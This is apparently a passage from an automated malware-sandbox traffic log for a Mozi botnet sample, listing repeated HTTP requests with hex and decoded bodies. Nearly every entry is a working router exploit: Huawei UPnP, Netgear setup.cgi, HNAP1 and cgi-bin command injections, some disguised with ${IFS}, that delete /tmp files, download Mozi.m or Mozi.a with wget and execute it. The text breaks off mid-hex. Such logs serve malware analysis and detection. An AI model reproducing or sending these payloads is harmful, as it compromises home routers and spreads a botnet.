78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 109.102.97.141:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 117.185.49.141:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 89.139.9.183:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 120.96.177.206:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 49.192.131.240:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 205.206.30.221:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 210.207.191.104:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 73.58.211.50:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 